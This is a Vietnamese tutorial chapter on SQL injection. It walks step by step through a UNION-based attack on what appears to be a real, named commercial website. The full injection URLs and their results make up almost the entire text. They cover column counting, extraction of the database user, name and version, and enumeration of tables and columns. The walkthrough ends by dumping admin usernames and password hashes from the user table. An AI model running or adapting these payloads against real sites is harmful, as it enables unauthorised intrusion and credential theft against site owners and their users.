1 Chương 3 Chương 3: Kiểm thử SQL Injection

Dạng tấn công sử dụng câu lệnh select

Các bước tấn công

+ B1: tìm website bị lỗi

+ B2 : kiểm tra website có lỗi không dùng dấu (') để check

https://www.tranhoang.vn/?php=product_detail&id=284

https://www.tranhoang.vn/?php=product_detail&id=284'
Nếu trang web hiện lên thông báo lỗi thì chúng ta có thể khai thác được lỗi sql
+ B3 : Tìm số cột của table mà câu lệnh sql truy vấn
dùng lệnh order by để kiểm tra
https://www.tranhoang.vn/?php=product_detail&id=284 order by 18—

https://www.tranhoang.vn/?php=product_detail&id=284 order by 19—

Xuất hiện lỗi => có 18 cột

+ B4 : hiện một số cột bị lỗi dùng câu lệnh union select để tìm lỗi
https://www.tranhoang.vn/?php=product_detail&id=-284 UNION
SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

Lỗi ở cột 3 và 8 đây là nơi ta tiêm sql

 + B5 : kiểm tra một vài thông tin của database về version:
user(): - https://www.tranhoang.vn/?php=product_detail&id=-284
+UNION+ALL+SELECT+1,2,3,4,5,6,7,user(),9,10,11,12,13,14,15,16,17,18—
tranhoangv_binh@localhost

database(): https://www.tranhoang.vn/?php=product_detail&id=-284
+UNION+ALL+SELECT+1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17,18--
tranhoangv_binh

version : https://www.tranhoang.vn/?php=product_detail&id=-284
+UNION+ALL+SELECT+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18--
5.7.37

+ B6 : liệt kê các bảng trong base ( unhex(hex(group_concat(table_name))) )

- Information_schema: đoạn này để lấy thông tin các
- Group_concat(colum_name)
Lệnh: https://www.tranhoang.vn/?php=product_detail&id=-284
+UNION+ALL+SELECT+1,2,3,4,5,6,7,unhex(hex(group_concat(table_name))),9,10,11,12,13,1
4,15,16,17,18 from information_schema.tables where table_schema=database()--
tbl_config,tbl_content,tbl_content_category,tbl_product,tbl_product_category,tbl_product_new,tbl_product_special,tbl
_user,tbl_visitor

+ B7 : liệt kê các cột trong bảng chứa thông tin login

lệnh: https://www.tranhoang.vn/?php=product_detail&id=-284
+UNION+ALL+SELECT+1,2,3,4,5,6,7,unhex(hex(group_concat(column_name))),9,10,11,12,13
,14,15,16,17,18 from information_schema.columns where
table_name=CHAR(116,98,108,95,117,115,101,114)--
id,uid,pwd,cat_id

+ B8 : Xem thông tin các cột trong bảng tbl_user(id, uid, pwd)
lệnh: https://www.tranhoang.vn/?php=product_detail&id=-284
+UNION+ALL+SELECT+1,2,3,4,5,6,7,unhex(hex(group_concat(id,0x3a,uid,0x3a,pwd))),9,10,1
1,12,13,14,15,16,17,18 from tbl_user --
1:admincp:1a035842a74c6819db5dc30e6b136464,2:subadmin:31b5d7b1a473763500b9b0d66e1a63c2